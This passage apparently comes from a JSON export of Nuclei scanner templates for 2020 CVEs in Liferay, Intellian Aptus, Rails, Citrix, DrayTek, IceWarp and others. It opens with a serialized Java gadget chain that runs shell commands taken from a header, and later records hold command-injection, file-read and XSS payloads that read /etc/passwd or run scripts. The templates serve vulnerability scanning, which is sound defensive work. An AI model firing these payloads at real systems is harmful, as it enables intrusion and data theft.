cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n\n payloads:\n command:\n - \"systeminfo\" # Windows\n - \"lsb_release -a\" # Linux\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"OS Name:.*Microsoft Windows\"\n - \"Distributor ID:\"\n condition: or\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n regex:\n - \"Microsoft Windows (.*)\"\n - \"Distributor ID: (.*)\"\n part: body\n# digest: 4a0a00473045022071f597a8c75493532cfd3eaadfa6c8bbcaea6a87a45925358b9bcc0a50aa1d86022100c8b38b6ee54a0e95d8f18b3065c202b3f8f14b17ed17622dc24bb8b61577b3f5:922c64590222798bb761d5b6d8e72950", "hash": "fc02beb7486ca3deb807ef2a324144e0", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308239" }, "name": "CVE-2020-7980.yaml", "content": "id: CVE-2020-7980\n\ninfo:\n name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution\n author: ritikchaddha\n severity: critical\n description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.\n remediation: |\n Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-7980\n - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html\n - https://github.com/Xh4H/Satellian-CVE-2020-7980\n - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html\n - https://github.com/0xT11/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-7980\n cwe-id: CWE-78\n epss-score: 0.97015\n epss-percentile: 0.99726\n cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: intelliantech\n product: aptus_web\n shodan-query: http.title:\"Intellian Aptus Web\"\n tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n Cookie: ctr_t=0; sid=123456789\n\n {\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 1}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022031d1966241ed308968ef852360775530e3798312c51bffd3e2011ddff009f30d0220601bed4b817baee1e1404f921e52a663759eec3f11e4a03015b7cb839fa416e8:922c64590222798bb761d5b6d8e72950", "hash": "51470ba17634ad4f78ad9ae5cd7419bd", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823a" }, "name": "CVE-2020-8115.yaml", "content": "id: CVE-2020-8115\n\ninfo:\n name: Revive Adserver <=5.0.3 - Cross-Site Scripting\n author: madrobot,dwisiswant0\n severity: medium\n description: |\n Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.\n reference:\n - https://hackerone.com/reports/775693\n - https://www.revive-adserver.com/security/revive-sa-2020-001/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8115\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/merlinepedra/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-8115\n cwe-id: CWE-79\n epss-score: 0.0187\n epss-percentile: 0.88123\n cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: revive-adserver\n product: revive_adserver\n tags: cve,cve2020,xss,hackerone,revive-adserver\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/www/delivery/afr.php?refresh=10000&\\\")',10000000);alert(1337);setTimeout('alert(\\\"\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - (?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202281c77cd44460978380c0e81c7ecb788518a1ef2891f50395a869f5afffae68022100a72bc525d6b1e771166cc67870ec31fe56551193440b4622c8652b3c5510ff13:922c64590222798bb761d5b6d8e72950", "hash": "651eb069844413e8e608cf6b353b004d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823b" }, "name": "CVE-2020-8163.yaml", "content": "id: CVE-2020-8163\n\ninfo:\n name: Ruby on Rails <5.0.1 - Remote Code Execution\n author: tim_koopmans\n severity: high\n description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution.\n remediation: |\n Upgrade Ruby on Rails to version 5.0.1 or above.\n reference:\n - https://hackerone.com/reports/304805\n - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0\n - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8163\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2020-8163\n cwe-id: CWE-94\n epss-score: 0.97016\n epss-percentile: 0.99691\n cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: rubyonrails\n product: rails\n tags: cve,cve2020,rails,rce,hackerone,rubyonrails\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210095f2004035f79cbcb4af27718650ade78e8f25da899e3692309e6ddbcfe39faa022059a57f2c0fa7b3f659a52948e81555e06688f8163061909b9c5647d723f90de6:922c64590222798bb761d5b6d8e72950", "hash": "367f6d0489ebd2ae253515a13b5df806", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823c" }, "name": "CVE-2020-8191.yaml", "content": "id: CVE-2020-8191\n\ninfo:\n name: Citrix ADC/Gateway - Cross-Site Scripting\n author: dwisiswant0\n severity: medium\n description: |\n Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.\n reference:\n - https://support.citrix.com/article/CTX276688\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8191\n - https://github.com/Elsfa7-110/kenzer-templates\n - https://github.com/jweny/pocassistdb\n - https://github.com/stratosphereips/nist-cve-search-tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-8191\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58959\n cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: application_delivery_controller_firmware\n tags: cve,cve2020,citrix,xss\n\nhttp:\n - raw:\n - |\n POST /menu/stapp HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n X-NITRO-USER: xpyZxwy6\n\n sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022024dcfb977f8e9977d9363d303d40f2267b3a85036968987ab62443171eef46a4022100c4694949e1496753150bcac302501f45335d93836cd76f7569f8af58e2992340:922c64590222798bb761d5b6d8e72950", "hash": "679b0722c32f3ed7fcc1c97a9b2a629c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823d" }, "name": "CVE-2020-8193.yaml", "content": "id: CVE-2020-8193\n\ninfo:\n name: Citrix - Local File Inclusion\n author: pdteam\n severity: medium\n description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability.\n reference:\n - https://github.com/jas502n/CVE-2020-8193\n - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html\n - https://support.citrix.com/article/CTX276688\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8193\n - https://github.com/0ps/pocassistdb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-8193\n cwe-id: CWE-287,CWE-284\n epss-score: 0.97463\n epss-percentile: 0.99954\n cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 6\n vendor: citrix\n product: application_delivery_controller_firmware\n tags: cve2020,cve,citrix,lfi,kev,packetstorm\n\nhttp:\n - raw:\n - |\n POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n X-NITRO-USER: xpyZxwy6\n X-NITRO-PASS: xWXHUJ56\n\n \n - |\n GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /menu/neo HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /menu/stc HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n X-NITRO-USER: oY39DXzQ\n X-NITRO-PASS: ZuU9Y9c1\n rand_key: {{randkey}}\n\n \n - |\n POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/xml\n X-NITRO-USER: oY39DXzQ\n X-NITRO-PASS: ZuU9Y9c1\n rand_key: {{randkey}}\n\n \n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n extractors:\n - type: regex\n name: randkey # dynamic variable\n regex:\n - \"(?m)[0-9]{3,10}\\\\.[0-9]+\"\n internal: true\n part: body\n# digest: 4a0a0047304502200a40fbcd2be6f6e3f74c8672c222c2fb30213a6ad086641b213481f80ad09f66022100d1466bbe3255aaff3b150fda8bf77ec553d990b3079a9573e835cf7273d4accf:922c64590222798bb761d5b6d8e72950", "hash": "ee0a08357c14db6b2780252f2c15f0f3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823e" }, "name": "CVE-2020-8194.yaml", "content": "id: CVE-2020-8194\n\ninfo:\n name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection\n author: dwisiswant0\n severity: medium\n description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.\n reference:\n - https://support.citrix.com/article/CTX276688\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8194\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-8194\n cwe-id: CWE-94\n epss-score: 0.90775\n epss-percentile: 0.98597\n cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: application_delivery_controller_firmware\n tags: cve,cve2020,citrix\n\nhttp:\n - raw:\n - |\n GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo HTTP/1.1\n Host: {{Hostname}}\n Cookie: startupapp=st\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"application/x-java-jnlp-file\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210089b07a1f7f35dbfe8d692c1e503b6cc4ea0333448f26729c63bcd6c8860d3bbc022100ecfd9558b4925dcc29dc8e6cf9a52b94d26e455c4e3839af7357ebca2c68ce0d:922c64590222798bb761d5b6d8e72950", "hash": "4a95f49ff727bb4b1ba1cf88bdd62781", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30823f" }, "name": "CVE-2020-8209.yaml", "content": "id: CVE-2020-8209\n\ninfo:\n name: Citrix XenMobile Server - Local File Inclusion\n author: dwisiswant0\n severity: high\n description: |\n Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.\n reference:\n - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/\n - https://support.citrix.com/article/CTX277457\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8209\n impact: |\n An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access.\n remediation: |\n Apply the latest security patches or updates provided by Citrix to fix the vulnerability.\n reference:\n - https://support.citrix.com/article/CTX277457\n - https://github.com/Miraitowa70/POC-Notes\n - https://github.com/dudek-marcin/Poc-Exp\n - https://github.com/hectorgie/PoC-in-GitHub\n - https://github.com/pen4uin/vulnerability-research\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-8209\n cwe-id: CWE-22\n epss-score: 0.96834\n epss-percentile: 0.9967\n cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: citrix\n product: xenmobile_server\n tags: cve2020,cve,citrix,lfi,xenmobile\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"fileDownload=true\"\n - \"application/octet-stream\"\n - \"attachment;\"\n condition: and\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502207857cb1944dd9e2083f4df982605d1dbcef6f8390d03106a23e982a29aed788f022100c410e96420e23c27071667a13d2d97f7f3f3676beb53a025e0ef3db9a599c5c0:922c64590222798bb761d5b6d8e72950", "hash": "f7f49a9481f7d267329c0fc0b1213a0a", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308240" }, "name": "CVE-2020-8497.yaml", "content": "id: CVE-2020-8497\n\ninfo:\n name: Artica Pandora FMS <=7.42 - Arbitrary File Read\n author: gy741\n severity: medium\n description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.\n remediation: |\n Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability.\n reference:\n - https://k4m1ll0.com/cve-2020-8497.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8497\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-8497\n cwe-id: CWE-306\n epss-score: 0.002\n epss-percentile: 0.56881\n cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: artica\n product: pandora_fms\n tags: cve,cve2020,fms,artica\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"type\"'\n - '\"id_user\"'\n - '\"user_name\"'\n - '\"text\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100af1818c7f41234374edabf5cb8c41a1f1f2b0006f1ad792cc58aa2617de103160220625f87c03f8a6d85ac8db0b8598f26a7b1324d62edd1e9420071b0d8c83e2610:922c64590222798bb761d5b6d8e72950", "hash": "72f80a8dae689fe6746acc7b5b4123d4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308241" }, "name": "CVE-2020-8512.yaml", "content": "id: CVE-2020-8512\n\ninfo:\n name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting\n author: pdteam,dwisiswant0\n severity: medium\n description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/47988\n - https://twitter.com/sagaryadav8742/status/1275170967527006208\n - https://cxsecurity.com/issue/WLB-2020010205\n - https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8512\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-8512\n cwe-id: CWE-79\n epss-score: 0.00692\n epss-percentile: 0.79726\n cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: icewarp\n product: icewarp_server\n shodan-query: title:\"icewarp\"\n tags: cve,cve2020,edb,packetstorm,xss,icewarp\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"IceWarp\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220144c263851998fa91377497074b757f9895d6aeea41149f1d411839b7f4a5d71022100f6ac53a3009610178242836e265a702b8c72cedd972b57d420d924c438483336:922c64590222798bb761d5b6d8e72950", "hash": "174117fe163cb036513aac00a59e9fc2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308242" }, "name": "CVE-2020-8515.yaml", "content": "id: CVE-2020-8515\n\ninfo:\n name: DrayTek - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network.\n remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1.\n reference:\n - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)\n - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8515\n - https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html\n - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-%28cve-2020-8515%29/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-8515\n cwe-id: CWE-78\n epss-score: 0.97079\n epss-percentile: 0.99754\n cpe: cpe:2.3:o:draytek:vigor2960_firmware:1.3.1:beta:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: draytek\n product: vigor2960_firmware\n tags: cve,cve2020,rce,kev,draytek\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/mainfunction.cgi HTTP/1.1\n Host: {{Hostname}}\n\n action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206d0846edf7e8e6118bd01670c01706ad026f58b9b53ef7cd70a6606c4c693f6d02206b183f00c8643042b064c49c928b48fd987a03476c663cd827dd563793cf11ef:922c64590222798bb761d5b6d8e72950", "hash": "45661675cba96f395d0e085ae2f3ed9c", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308243" }, "name": "CVE-2020-8615.yaml", "content": "id: CVE-2020-8615\n\ninfo:\n name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery\n author: r3Y3r53\n severity: medium\n description: |\n A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).\n remediation: update to v.1.5.3\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2020-8615\n - https://wpscan.com/vulnerability/10058\n - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html\n - https://wpvulndb.com/vulnerabilities/10058\n - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2020-8615\n cwe-id: CWE-352\n epss-score: 0.00632\n epss-percentile: 0.78607\n cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: themeum\n product: tutor_lms\n framework: wordpress\n publicwww-query: /wp-content/plugins/tutor/\n tags: cve,cve2020,wpscan,packetstorm,csrf,wp-plugin,wp,tutor,wordpress,themeum\nvariables:\n user: \"{{rand_base(6)}}\"\n pass: \"{{rand_base(8)}}\"\n email: \"{{randstr}}@{{rand_base(5)}}.com\"\n firstname: \"{{rand_base(5)}}\"\n lastname: \"{{rand_base(5)}}\"\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 